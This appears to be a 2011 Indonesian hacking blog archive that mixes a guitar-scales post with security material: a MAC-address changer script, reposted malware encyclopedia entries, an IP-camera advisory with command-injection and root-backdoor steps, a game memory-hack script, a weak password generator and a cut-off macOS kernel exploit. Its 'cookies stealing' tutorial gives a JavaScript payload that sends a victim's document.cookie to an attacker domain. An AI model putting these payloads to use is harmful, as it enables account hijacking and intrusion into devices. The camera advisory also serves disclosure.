-=[ D4wFl1N ]=-: October 2011

31 October 2011

5 Scale yang Wajib dikuasai Gitaris Pemula

Biar isi blognya ada improvisasi sedikit drpd isinya cuman coding dan hacking semua :D
(sok amat yah gw biar dibilang heker :p)

berikut ini adalah beberapa scale yg wajib dikuasai oleh gitaris pemula. sebenarnya ga ada yg ngewajibin,
tapi untuk bisa ber-improvisasi dengan baik dalam sebuah lagu, gitaris memang perlu scale-scale berikut ini :

1. Scale Mayor
Ini yang paling umum dan dasar banget. scale mayor di sini
adalah diatonis minor.

2. Scale Minor
Scale minor diperlukan banget dlm sebuah lagu. Biasanya gitaris memasukkan minor harmonik atau melodi,
sehingga keindahan dr sebuah lg akan lebih kelihatan atau istilah kerennya "fill nya dape banget"
(Nah mulai sok lg jadi gitaris nih hahahha :p)

3. Blues scale
Scale blues bisa dibilang jiwanya dlm bermain gitar. Gitaris rock senang memasukkan scale ini dlm lagunya,
bahkan jazz pun mamakai blues di dalamnya.

4. Pentatonik Mayor dan 5. Pentatonik Minor
Pentatonik juga sering digunakan saat berimprovisasi, baik pentatonik mayor atau minor, keduanya sering dipakai. Yang perlu diperhatikan, kadang gitaris menganggap pentatonik minor adalah blues, ini karena dari segi bunyi keduanya emang mirip banget, cuman bedanya satu nada saja. Maka hati-hati jangan menyalahartikan.

5 scale tersebut bisa dibilang paling essensial, karena kebanyakkan gitaris memakainya
walaupun begitu mempelajari scale lainnya lebih bagus untuk memperluas dinamika musik kita.
jangan lupa juga sering mendengar dan bergaul dgn gitaris lain :)

Istilah berikut ini adalah beberapa istilah yg bisa mempermudah mempelajari teori musik dasar kita
diantaranya :

Blues Scale yg memiliki 6 nada pada tiap oktafnya, scale ini berkarakter minor.
Chord Gabungan 2 nada atau lebih yg dibunyikan bersamaan
Diatonis Scale yg mempunyai 7 nada pada tiap oktafnya. ini merupakan scale paling dasar dan paling umum digunakan
Interval jarak dari satu nada ke nada lainnya dalam satu oktaf
Kromatis atau tanda keadaan suatu nada berada 1/2 laras dr nada aslinya naik (#/kress) atau turun (b/mol).
Mayor suatu jenis interval yang bisa diasumsikan sbg "cerah" atau "bahagia"
Minor suatu jenis interval/scale yang bisa diasumsikan sbg "sedih"

Baca Selengkapnya... 5 Scale yang Wajib dikuasai Gitaris Pemula

24 October 2011

FuCkMAC v.0.1

#!/usr/bin/env python
#
######################################################
# FuCkMAC.py is a script to change the MAC addres
# on *nix using 'ifconfig' tool..
#
# D4wFl1N[at]deadc0de[dot]or[dot]id
######################################################
#
#

import sys
import os
import socket
import fcntl
import struct
import array
import getopt
import platform

# print banner
def Banner():
    print """
################################
## FuCkMAC v0.1                ##
## D4wFl1N[at]deadc0de[dot]or[dot]id##
################################
"""

# check os
def CheckOS():
    OS = platform.system()
    if OS != 'Linux':
        print "[-] Warning you'r not using Linux"

# check the user if root or not
def CheckRoot():
    if os.getuid() & os.getgid() != 0:
        Banner()
        print "[-] Your have to be root"
        sys.exit(0)

# set the mac address
def SetMAC(device,mac):
    os.system("ifconfig %s down" % device)
    os.system("ifconfig %s hw ether %s" % (device,mac))
    os.system("ifconfig %s up" % device)

# get names of all "up" network interfaces
def GetInterfaces():
    max_possible = 128 # arbitrary. raise if needed.
    bytes = max_possible * 32
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    names = array.array('B', '\0' * bytes)
    outbytes = struct.unpack('iL', fcntl.ioctl(
        s.fileno(),
        0x8912, # SIOCGIFCONF
        struct.pack('iL', bytes, names.buffer_info()[0])
    ))[0]
    namestr = names.tostring()
    return [namestr[i:i+32].split('\0', 1)[0] for i in range(0, outbytes, 32)]

# Useage
def Usage():
    Banner()
    print """%s\n
-h\t\t: print this message
-l\t\t: list up interfaces
-i \t: select interface
-a

\t: change MAC address
""" % (sys.argv[0])

######################################
################ MAIN ################
######################################

CheckOS()
CheckRoot()

if len(sys.argv) < 2:
    Usage()
    sys.exit(0)

try:
    opts, args = getopt.getopt(sys.argv[1:], "la:i:h")
except getopt.GetoptError, err:
    print str(err)
    sys.exit(2)

interfaces = GetInterfaces()

Address        = ""
Interface    = ""

for o, a in opts:
    if o == "-h":
        Usage()
        sys.exit(0)
    elif o == "-l":
        print "Available interfaces :"
        for device_name in interfaces:
            print device_name
        sys.exit(0)
    elif o == "-i":
        Interface = a
        for device_name in interfaces:
            if Interface not in interfaces:
                print "[-]",Interface,"is invalid interface."
                sys.exit(0)
        print "[*] Interface:", Interface
    elif o == "-a":
        Address = a
        if len(Address) != 17:
            print "[-] \"",Address,"\" is invalid MAC address."
            sys.exit(0)
        print "[*] FuCk MACaddr:", Address
    else:
        assert False, "unhandled option"

if len(Address) < 1:
    print "[-] You have to enter the fuCk MAC address try '%s -h' for help" % (sys.argv[0])
    sys.exit(0)
elif len(Interface) < 1:
    print "[-] You have to enter the interface name try '%s -h' for help" % (sys.argv[0])
    sys.exit(0)

SetMAC(Interface, Address)

print "[*] Done"

Baca Selengkapnya... FuCkMAC v.0.1

16 October 2011

Sucuri WordPress check - v1.0 <= TimThumb script file checker

http://sucuri.net/tools/sucuri_wp_check.txt

Baca Selengkapnya... Sucuri WordPress check - v1.0 <= TimThumb script file checker

13 October 2011

Backdoor:Win32/Smadow.gen!B

Aliases :
Backdoor:Win32/Smadow.gen!B is also known as Backdoor.Maxplus.13 (Dr.Web), Maxplus (other).
Explanation :
Backdoor:Win32/Smadow.gen!B is a generic detection for malware that can perform different actions, such as executing other malware. The executed malware may be detected as TrojanDropper:Win32/Sirefef.B or Trojan:Win32/Sirefef.

Top
Backdoor:Win32/Smadow.gen!B is a generic detection for malware that can perform different actions, such as executing other malware. The executed malware may be detected as TrojanDropper:Win32/Sirefef.B or Trojan:Win32/Sirefef.

Installation
Some variants of this malware may be present in the Application Data directory:

%APPDATA%\.exe
The registry is modified to run the trojan at each Windows start.

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Sets value: "AD Network"
With data: "%APPDATA%\.exe"

In the wild, we have observed some variants of Backdoor:Win32/Smadow.gen!B present with other malware including TrojanDropper:Win32/Sirefef.B or Trojan:Win32/Sirefef. Some variants of this malware attempt to connect with the following IP addresses to download arbitrary files:

* 69.50.212.158
* 193.105.154.218

Analysis by Patrik Vicol

Baca Selengkapnya... Backdoor:Win32/Smadow.gen!B

Backdoor:Win32/R2d2.A

Aliases :
Backdoor:Win32/R2d2.A is also known as Win-Trojan/R2d2.360448 (AhnLab), W32/R2D2.A (Command), Win32/R2D2.A (ESET), Backdoor.Win32.R2D2.a (Kaspersky), Troj/BckR2D2-A (Sophos), Backdoor.R2D2 (Symantec).
Explanation :
Backdoor:Win32/R2d2.A is a trojan that communicates with a remote server to listen for commands from an attacker. The trojan monitors Skype communications, captures screen shots and may download and execute arbitrary files.
Top
Backdoor:Win32/R2d2.A is a trojan that communicates with a remote server to listen for commands from an attacker. The trojan monitors Skype communications, captures screen shots and may download and execute arbitrary files.

Installation
This trojan may be installed by another process and may be present in the Windows system folder as the following:

    * %windir%\System32\mfc42ul.dll
The registry is modified to run the malware at each Windows start. In subkey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Sets value: "AppInit_DLLs" With data: "%windir%\System32\mfc42ul.dll"

Payload
Installs additional component Backdoor:Win32/R2d2.A creates the following component, detected as Trojan:Win32/R2d2.A!rootkit :

    * %windir%\System32\winsys32.sys

This component is used by the backdoor to perform the following actions:

    * Delete or rename protected files by modifying registry data
    * Modify other registry data
    * Modify file information properties of files
    * Create or modify files
    * Link to \\Device\KeyboardClassC to capture keystrokes

For more information about Trojan:Win32/R2d2.A!rootkit, see the description elsewhere in the encyclopedia.

Communicates with a remote server
Backdoor:Win32/R2d2.A is only activated for the following set of processes:

    * explorer.exe
    * Skype.exe
    * SkypePM.exe
    * msnmsgr.exe
    * yahoomessenger.exe
    * x-lite.exe
    * sipgatexlite.exe

Backdoor:Win32/R2d2.A connects to a remote server to listen for commands from an attacker. Commands could instruct the trojan to perform the following actions:

    * Monitor incoming and outgoing calls
    * Send collected Skype data, version information and online status to a remote server
    * Download and execute arbitrary files
    * Take desktop screen shots during web browsing with the following applications:
          o firefox.exe
          o iexplore.exe
          o opera.exe
          o navigator.exe
          o seamonkey.exe

Analysis by Jireh Sanico

Baca Selengkapnya... Backdoor:Win32/R2d2.A

Trojan:Win32/R2d2.A!rootkit

Aliases :

Trojan:Win32/R2d2.A!rootkit is also known as Win-Trojan/R2d2.5376 (AhnLab), W32/R2D2.A (Command), BackDoor.R2D2.1 (Dr.Web), Win32/R2D2.A (ESET), Backdoor.Win32.R2D2.a (Kaspersky), Troj/BckR2D2-A (Sophos), Backdoor.R2D2 (Symantec), Rootkit.R2D2.B (VirusBuster).
Explanation :
Trojan:Win32/R2d2.A!rootkit is a component of Backdoor:Win32/R2d2.A. It can delete or rename protected files, modify file properties and perform other actions.

Top

Trojan:Win32/R2d2.A!rootkit is a component of Backdoor:Win32/R2d2.A. It can delete or rename protected files, modify file properties and perform other actions.

Installation

This malware is installed by another process and may be present in the Windows system folder as the following:

    * %windir%\System32\winsys32.sys

The trojan executes as a service named "winsys32".

Payload
Performs file operations on protected files/modifies system dataThis malware is used by Backdoor:Win32/R2d2.A to perform the following actions:

    * Delete or rename protected files by modifying registry data in the following subkey:
          o HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperation
    * Modify other registry data
    * Modify file information properties of other files via the Windows kernel-mode driver support routine ZwSetInformationFile
    * Create or modify files
    * Link to \\Device\KeyboardClassC to capture keystrokes

Analysis by Jireh Sanico

Baca Selengkapnya... Trojan:Win32/R2d2.A!rootkit

Trojan:Java/SMSer.T

Aliases :

There are no other names known for Trojan:Java/SMSer.T.

Explanation :

Trojan:Java/SMSer.T is a trojan that affects mobile devices with Java Platform, Micro Edition supported using the application name 'CanvasFormMIDlet MIDlet Suite'.

Top

Trojan:Java/SMSer.T is a trojan that affects mobile devices with Java Platform, Micro Edition supported using the application name 'CanvasFormMIDlet MIDlet Suite'.

Trojan:Java/SMSer.T arrives as .JAR file installer named 'photo.jar'.

Once installed, it will display the following text in Russian:

"�Ÿо�‡�‚и го�‚ово..."

"С��‹лка на ди��‚�€иб�ƒ�‚ив п�€иложени� п�€иде�‚ в о�‚ве�‚ном SMS в �‚е�‡ение 5 мин�ƒ�‚. �Ÿе�€ейди�‚е по пол�ƒ�‡енной ��‹лке и �ка�‡ай�‚е п�€иложение."

Which translates to:

"Almost ready... "

"a reference to the application distribution package will come [via] SMS within 5 minutes. Click on the link provided and download the application."

If the user clicks on the link, the trojan will appear to download a package, when in fact this is executing the trojan's payload and initiates the sending of SMS's to a premium number.

When it runs in the background, it sends SMS messages without the user's consent. The SMS it sends to the Russian premium SMS short code number 3602 contains the string "503448915" which may charge the user without their knowledge.

Analysis by Marianne Mallen

Baca Selengkapnya... Trojan:Java/SMSer.T

Trojan:Java/Redbrowser.B

Aliases :

There are no other names known for Trojan:Java/Redbrowser.B.

Explanation :

Trojan:Java/RedBrowser.B is a trojan that affects mobile devices with Java Platform, Micro Edition supported, that poses as a mobile-dating application.

Top

Trojan:Java/RedBrowser.B is a trojan that affects mobile devices with Java Platform, Micro Edition supported, that poses as a legitimate application.

Trojan:Java/RedBrowser.B may be downloaded as a standard .JAR file installer with the name 'postcard.jar', posing as a mobile-dating application.

When it runs in the background, it sends SMS messages without the user's consent, causing the infected user to incur high SMS charges. The SMS number and message is parsed from a file that is bundled with the trojan named 'ico.ico'; this file is a text file masquerading as an icon file.

Analysis by Marianne Mallen

Baca Selengkapnya... Trojan:Java/Redbrowser.B

ABUS TVIP 11550/21550 File Read / File Upload / Command Exec

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command excution (input validation bug)
- How it's totally compromised including ssh root login.

- Summary

The ABUS 11550 and 21550 are IP Webcams that can be configured via a
webinterface.
While experimenting multiple vulnerabilities where discovered that give
rootaccess
to the Operating System, debian-linux, of the camera. The webserver of the
camera is
BOA and runs as root.

Although these vulnerabilities can ONLY be exploited  when logged in as
admin, they
can still be considered critical since the camera can be used to gain
access to the
network behind it. I did not find a way past the login screen without
proper credentials (yet).

- Arbitrary file read

When logged in as admin its possible to read any file on the filesystem since
the webserver is running as root.

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI there also is a filewrite CGI that can
(over)write any
file.

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several htmlforms to configure services such as a FTPclient
and
a SMTPclient. These are used to notify users and upload videos when the
camera's motion detection detects movement. These htmlforms can be used to
execute
arbitrary commands as root. I've found bugs in the SMTP and FTP forms but
probably
other forms will contain the same bug (unchecked).

Exploit:
In the configuration -> smtp general part is a webform where an
administrator's
emailadress can be filled out (Administrator e-Mail address).
The form lacks checking metacharacters such as ;, | and `.
When a test email from this form is sent the webinterface executes ssmtp -t
.
So it is possible to 'break' the commandline by using `ls` for instance.
After
submitting
the command via the 'testbutton' this will be the output:

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Which means we are situated in a directory that contains a backup directory.

`pwd` also works

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Unfortunately this only outputs the first line of the commandline output.
But, we can work around this :)

The system also contains a System Log function that shows output of the
systemlog.
Now, if we want a little more output than just the first line, for instance
"ls /" we can do it by filling out `ls /|logger` which sends the output
to the system logfile. Which can then be viewed from the webinterface.

Oct  8 14:35:15  root: bin
Oct  8 14:35:15  root: dev
Oct  8 14:35:15  root: etc
Oct  8 14:35:15  root: include
Oct  8 14:35:15  root: init
Oct  8 14:35:15  root: lib
Oct  8 14:35:15  root: linuxrc
Oct  8 14:35:15  root: mnt
Oct  8 14:35:15  root: opt
Oct  8 14:35:15  root: proc
Oct  8 14:35:15  root: root
Oct  8 14:35:15  root: sbin
Oct  8 14:35:15  root: smtp_test.sh
Oct  8 14:35:15  root: sys
Oct  8 14:35:15  root: tag_replace.sh
Oct  8 14:35:15  root: tmp
Oct  8 14:35:15  root: usr
Oct  8 14:35:15  root: var
Oct  8 14:35:15  root: web

Getting the correct commandline output can also be obtained by redirecting
it to a readble file on de webserver itself by doing `ls -alR
/>/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt

- How it's totally compromised including ssh root login.

I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is a SSHserver/Client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadowfile and noticed that user root had
no password,
so ssh'ing in was not an option, yet. So had to create a user, did it the
following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo
"test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So, now we can login as user test with password test. User test has UID 0,
thus root.

test@ipcamera's password:
Welcome to

_____    __      ___       __     ___       _     _    _
|  ___|  /      / __     /     |  _     /       / /
| |___  / /   | /__   / /   | |  |  / /     V /
|  ___|| |__| | |  _   / | |__| | | | | | | |__| |    /
| |    |  __  | | |    |  __  | | |_/ / |  __  |   | |
|_|    |_|  |_| |_|   \_|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)

Also, its possible to mount a samba or nfsshare via the webinterface and
copy files
that way.

Just my two cents
Marco van berkum

Baca Selengkapnya... ABUS TVIP 11550/21550 File Read / File Upload / Command Exec

12 October 2011

Cookies Stealing By PakH3X0r

.itsuper PG! TUT OF Cookies Stealing By PakH3X0r
Note: Dnt use this on any innocent ppls and Pakistani and i m not responsible for any illegal use

Wt r cookies?
Cookies r basically strings by which a website remember you your PC ect.
When u login to any web then web server will make some cookies

.itsuper PG2 And web server will remember u by your cookies

Wt is cookies stealing?
Cookies stealing is a way by which u can hack any account with out knowing user name and password u hv 2 send a link to your victim when he click your link he will get a image or PHP script and this script will

.itsuper PG3 give u access to his account until victim get logout but in the case of yahoo cookies will deleted after 24 hours and u need to just refresh the page to get new cookies for you interesting
Hw we can steal cookies?
i knw 2 ways to steal cookies most ppls ask me ab8 this method but today

.itsuper PG4 i m giving u many use full scripts by these script u can hack ppls download scripts from here
http://tinyurl.com/cookies-stealing
this zip file include IP stealer script one facebook cookies stealing script one cookies stealing script and most important yahoo cookies stealer script

.itsuper Pg5 1st of all i will tell u ab8 yahoo cookies stealing u will get an rar file in that file you will get 5 more files upload them on some free hosting sites then create a directory with the name cookies and send this java script to ur victim javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

.itsuper PG6 ok download another script from here tut is also in it hope u will enjoy
http://tinyurl.com/5vbukmw

Baca Selengkapnya... Cookies Stealing By PakH3X0r

League of Legends Zoom Hack Auto IT Script

;; author: mawize
;; version: 0.10
;; last update: October 11

;; the magic address ;)
;; you can find the magic address easyly by following the steps in this video
;; http://www.youtube.com/watch?v=KUJsOUn9E9A
$ADRESSE = 0x00AAF21C ;; Patch 1.0.0.126 (Oct 10 2011/16:16:12)

;; Hotkeys
;; you can find the HexCodes for all Keys here
;; http://www.autoit.de/dokumentation_aktuell/libfunctions/_IsPressed.htm
$KEY_ZOOMIN = "6D" ; NUMPADSUB
$KEY_ZOOMOUT = "6B" ; NUMPADADD

;; zoom step
;; you can play around with this but i think 100 was pretty good
$ZOOMSTEP = 100

;; this probably wont change ;)
$PNAME = "League of Legends.exe"

;#include
#include
$currentZoom = 2250;
$previousZoom = 2250;

While 1
    sleep(10)

    $handle = _MemoryOpen(ProcessExists($PNAME))
    If(_IsPressed($KEY_ZOOMIN)) Then
        $currentZoom = _MemoryRead($ADRESSE,$handle, "float") - $ZOOMSTEP
    ElseIf(_IsPressed($KEY_ZOOMOUT)) Then
        $currentZoom = _MemoryRead($ADRESSE,$handle, "float") + $ZOOMSTEP
    EndIf

    If($currentZoom <> $previousZoom AND ProcessExists($PNAME)) Then
        _MemoryWrite($ADRESSE,$handle,$currentZoom, "float")
        $previousZoom = $currentZoom;
    EndIf
    _MemoryClose(ProcessExists($PNAME))
WEnd

;=========================================================
;==================== Start NomadMemory.au3 =====================
;=========================================================
#include-once
#region _Memory
;=========================================================
; AutoIt Version:    3.1.127 (beta)
; Language:            English
; Platform:            All Windows
; Author:            Nomad
; Requirements:        These functions will only work with beta.
;=========================================================
; Credits:    wOuter - These functions are based on his original _Mem() functions.
;            But they are easier to comprehend and more reliable. These
;            functions are in no way a direct copy of his functions. His
;            functions only provided a foundation from which these evolved.
;=========================================================
;
; Functions:
;
;=========================================================
; Function:            _MemoryOpen($iv_Pid[, $iv_DesiredAccess[, $iv_InheritHandle]])
; Description:        Opens a process and enables all possible access rights to the
;                    process. The Process ID of the process is used to specify which
;                    process to open. You must call this function before calling
;                    _MemoryClose(), _MemoryRead(), or _MemoryWrite().
; Parameter(s):        $iv_Pid - The Process ID of the program you want to open.
;                    $iv_DesiredAccess - (optional) Set to 0x1F0FFF by default, which
;                                        enables all possible access rights to the
;                                        process specified by the Process ID.
;                    $iv_InheritHandle - (optional) If this value is TRUE, all processes
;                                        created by this process will inherit the access
;                                        handle. Set to 1 (TRUE) by default. Set to 0
;                                        if you want it FALSE.
; Requirement(s):    None.
; Return Value(s):     On Success - Returns an array containing the Dll handle and an
;                                open handle to the specified process.
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                            1 = Invalid $iv_Pid.
;                            2 = Failed to open Kernel32.dll.
;                            3 = Failed to open the specified process.
; Author(s):        Nomad
; Note(s):
;========================================================
Func _MemoryOpen($iv_Pid, $iv_DesiredAccess = 0x1F0FFF, $iv_InheritHandle = 1)

    If Not ProcessExists($iv_Pid) Then
        SetError(1)
        Return 0
    EndIf

    Local $ah_Handle[2] = [DllOpen('kernel32.dll')]

    If @Error Then
        SetError(2)
        Return 0
    EndIf

    Local $av_OpenProcess = DllCall($ah_Handle[0], 'int', 'OpenProcess', 'int', $iv_DesiredAccess, 'int', $iv_InheritHandle, 'int', $iv_Pid)

    If @Error Then
        DllClose($ah_Handle[0])
        SetError(3)
        Return 0
    EndIf

    $ah_Handle[1] = $av_OpenProcess[0]

    Return $ah_Handle

EndFunc

;=========================================================
; Function:            _MemoryRead($iv_Address, $ah_Handle[, $sv_Type])
; Description:        Reads the value located in the memory address specified.
; Parameter(s):        $iv_Address - The memory address you want to read from. It must
;                                be in hex format (0x00000000).
;                    $ah_Handle - An array containing the Dll handle and the handle
;                                of the open process as returned by _MemoryOpen().
;                    $sv_Type - (optional) The "Type" of value you intend to read.
;                                This is set to 'dword'(32bit(4byte) signed integer)
;                                by default. See the help file for DllStructCreate
;                                for all types. An example: If you want to read a
;                                word that is 15 characters in length, you would use
;                                'char[16]' since a 'char' is 8 bits (1 byte) in size.
; Return Value(s):    On Success - Returns the value located at the specified address.
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                            1 = Invalid $ah_Handle.
;                            2 = $sv_Type was not a string.
;                            3 = $sv_Type is an unknown data type.
;                            4 = Failed to allocate the memory needed for the DllStructure.
;                            5 = Error allocating memory for $sv_Type.
;                            6 = Failed to read from the specified process.
; Author(s):        Nomad
; Note(s):            Values returned are in Decimal format, unless specified as a
;                    'char' type, then they are returned in ASCII format. Also note
;                    that size ('char[size]') for all 'char' types should be 1
;                    greater than the actual size.
;=========================================================
Func _MemoryRead($iv_Address, $ah_Handle, $sv_Type = 'dword')

    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf

    Local $v_Buffer = DllStructCreate($sv_Type)

    If @Error Then
        SetError(@Error + 1)
        Return 0
    EndIf

    DllCall($ah_Handle[0], 'int', 'ReadProcessMemory', 'int', $ah_Handle[1], 'int', $iv_Address, 'ptr', DllStructGetPtr($v_Buffer), 'int', DllStructGetSize($v_Buffer), 'int', '')

    If Not @Error Then
        Local $v_Value = DllStructGetData($v_Buffer, 1)
        Return $v_Value
    Else
        SetError(6)
        Return 0
    EndIf

EndFunc

;==========================================================
; Function:            _MemoryWrite($iv_Address, $ah_Handle, $v_Data[, $sv_Type])
; Description:        Writes data to the specified memory address.
; Parameter(s):        $iv_Address - The memory address which you want to write to.
;                                It must be in hex format (0x00000000).
;                    $ah_Handle - An array containing the Dll handle and the handle
;                                of the open process as returned by _MemoryOpen().
;                    $v_Data - The data to be written.
;                    $sv_Type - (optional) The "Type" of value you intend to write.
;                                This is set to 'dword'(32bit(4byte) signed integer)
;                                by default. See the help file for DllStructCreate
;                                for all types. An example: If you want to write a
;                                word that is 15 characters in length, you would use
;                                'char[16]' since a 'char' is 8 bits (1 byte) in size.
; Return Value(s):    On Success - Returns 1
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                            1 = Invalid $ah_Handle.
;                            2 = $sv_Type was not a string.
;                            3 = $sv_Type is an unknown data type.
;                            4 = Failed to allocate the memory needed for the DllStructure.
;                            5 = Error allocating memory for $sv_Type.
;                            6 = $v_Data is not in the proper format to be used with the
;                                "Type" selected for $sv_Type, or it is out of range.
;                            7 = Failed to write to the specified process.
; Author(s):        Nomad
; Note(s):            Values sent must be in Decimal format, unless specified as a
;                    'char' type, then they must be in ASCII format. Also note
;                    that size ('char[size]') for all 'char' types should be 1
;                    greater than the actual size.
;==========================================================
Func _MemoryWrite($iv_Address, $ah_Handle, $v_Data, $sv_Type = 'dword')

    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf

    Local $v_Buffer = DllStructCreate($sv_Type)

    If @Error Then
        SetError(@Error + 1)
        Return 0
    Else
        DllStructSetData($v_Buffer, 1, $v_Data)
        If @Error Then
            SetError(6)
            Return 0
        EndIf
    EndIf

    DllCall($ah_Handle[0], 'int', 'WriteProcessMemory', 'int', $ah_Handle[1], 'int', $iv_Address, 'ptr', DllStructGetPtr($v_Buffer), 'int', DllStructGetSize($v_Buffer), 'int', '')

    If Not @Error Then
        Return 1
    Else
        SetError(7)
        Return 0
    EndIf

EndFunc

;==========================================================
; Function:            _MemoryClose($ah_Handle)
; Description:        Closes the process handle opened by using _MemoryOpen().
; Parameter(s):        $ah_Handle - An array containing the Dll handle and the handle
;                                of the open process as returned by _MemoryOpen().
; Return Value(s):    On Success - Returns 1
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                            1 = Invalid $ah_Handle.
;                            2 = Unable to close the process handle.
; Author(s):        Nomad
; Note(s):
;===========================================================
Func _MemoryClose($ah_Handle)

    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf

    DllCall($ah_Handle[0], 'int', 'CloseHandle', 'int', $ah_Handle[1])
    If Not @Error Then
        DllClose($ah_Handle[0])
        Return 1
    Else
        DllClose($ah_Handle[0])
        SetError(2)
        Return 0
    EndIf

EndFunc

;===========================================================
; Function:            SetPrivilege( $privilege, $bEnable )
; Description:        Enables (or disables) the $privilege on the current process
;                   (Probably) requires administrator privileges to run
;
; Author(s):        Larry (from autoitscript.com's Forum)
; Notes(s):
; http://www.autoitscript.com/forum/index.php?s=&showtopic=31248&view=findpost&p=223999
;===========================================================

Func SetPrivilege( $privilege, $bEnable )

    Const $TOKEN_ADJUST_PRIVILEGES = 0x0020
    Const $TOKEN_QUERY = 0x0008
    Const $SE_PRIVILEGE_ENABLED = 0x0002
    Local $hToken, $SP_auxret, $SP_ret, $hCurrProcess, $nTokens, $nTokenIndex, $priv
    $nTokens = 1
    $LUID = DLLStructCreate("dword;int")
    If IsArray($privilege) Then    $nTokens = UBound($privilege)
    $TOKEN_PRIVILEGES = DLLStructCreate("dword;dword[" & (3 * $nTokens) & "]")
    $NEWTOKEN_PRIVILEGES = DLLStructCreate("dword;dword[" & (3 * $nTokens) & "]")
    $hCurrProcess = DLLCall("kernel32.dll","hwnd","GetCurrentProcess")
    $SP_auxret = DLLCall("advapi32.dll","int","OpenProcessToken","hwnd",$hCurrProcess[0],   _
            "int",BitOR($TOKEN_ADJUST_PRIVILEGES,$TOKEN_QUERY),"int_ptr",0)
    If $SP_auxret[0] Then
        $hToken = $SP_auxret[3]
        DLLStructSetData($TOKEN_PRIVILEGES,1,1)
        $nTokenIndex = 1
        While $nTokenIndex <= $nTokens
            If IsArray($privilege) Then
                $priv = $privilege[$nTokenIndex-1]
            Else
                $priv = $privilege
            EndIf
            $ret = DLLCall("advapi32.dll","int","LookupPrivilegeValue","str","","str",$priv,   _
                    "ptr",DLLStructGetPtr($LUID))
            If $ret[0] Then
                If $bEnable Then
                    DLLStructSetData($TOKEN_PRIVILEGES,2,$SE_PRIVILEGE_ENABLED,(3 * $nTokenIndex))
                Else
                    DLLStructSetData($TOKEN_PRIVILEGES,2,0,(3 * $nTokenIndex))
                EndIf
                DLLStructSetData($TOKEN_PRIVILEGES,2,DllStructGetData($LUID,1),(3 * ($nTokenIndex-1)) + 1)
                DLLStructSetData($TOKEN_PRIVILEGES,2,DllStructGetData($LUID,2),(3 * ($nTokenIndex-1)) + 2)
                DLLStructSetData($LUID,1,0)
                DLLStructSetData($LUID,2,0)
            EndIf
            $nTokenIndex += 1
        WEnd
        $ret = DLLCall("advapi32.dll","int","AdjustTokenPrivileges","hwnd",$hToken,"int",0,   _
                "ptr",DllStructGetPtr($TOKEN_PRIVILEGES),"int",DllStructGetSize($NEWTOKEN_PRIVILEGES),   _
                "ptr",DllStructGetPtr($NEWTOKEN_PRIVILEGES),"int_ptr",0)
        $f = DLLCall("kernel32.dll","int","GetLastError")
    EndIf
    $NEWTOKEN_PRIVILEGES=0
    $TOKEN_PRIVILEGES=0
    $LUID=0
    If $SP_auxret[0] = 0 Then Return 0
    $SP_auxret = DLLCall("kernel32.dll","int","CloseHandle","hwnd",$hToken)
    If Not $ret[0] And Not $SP_auxret[0] Then Return 0
    return $ret[0]
EndFunc   ;==>SetPrivilege

#endregion

Baca Selengkapnya... League of Legends Zoom Hack Auto IT Script

10 October 2011

pwtool.php wp security

//From inc/admin/pwtool.php:
echo "Strong Password: " . '' . make_password(15) . "";

//From libs/functions.php:
if (!function_exists('make_password')) :
    /**
    * @public
    * @uses make_seed()
    * Generate a strong password
    * @return string
    */
    function make_password($password_length)
    {
        srand(make_seed());
        $alfa = "!@123!@4567!@890qwer!@tyuiopa@!sdfghjkl@!zxcvbn@!mQWERTYUIO@!PASDFGH@!JKLZXCVBNM!@";
        $token = "";
        for($i = 0; $i < $password_length; $i ++) {
          $token .= $alfa[rand(0, strlen($alfa))];
        }
        return $token;
    }
endif;

http://pastebin.com/4rJjz3S2

Baca Selengkapnya... pwtool.php wp security

09 October 2011

Mac OS X < 10.6.7 Kernel Panic Exploit

/*
Mac OS X < 10.6.7 Kernel Panic Exploit
CVE-2011-0182, Proof Of Concept Code

Author - Chanam Park (hkpco)
Date - 2011. 06
Contact - chanam.park@hkpco.kr , http://hkpco.kr , @hkpco

Thanks for inspiration / x82, riaf.
*/
// Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32

#include
#include

#include

#include
#include
#include

void dummy_func( void ) { asm volatile( ".byte 0xff" ); }

int main( void )
{
int ret;
union ldt_entry cgate, cgate2;
char dummy[128] = {0x00,};

cgate.call_gate.offset00 = (unsigned int)dummy_func & 0xffff;
cgate.call_gate.offset16 = ((unsigned int)dummy_func >> 16) & 0xffff;
// You can input shellcode address value here to get the root shell.
/* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p
The normal system has a little different environment.
I have no time for this anymore because of my summer break is over.
So.. Good Luck! */

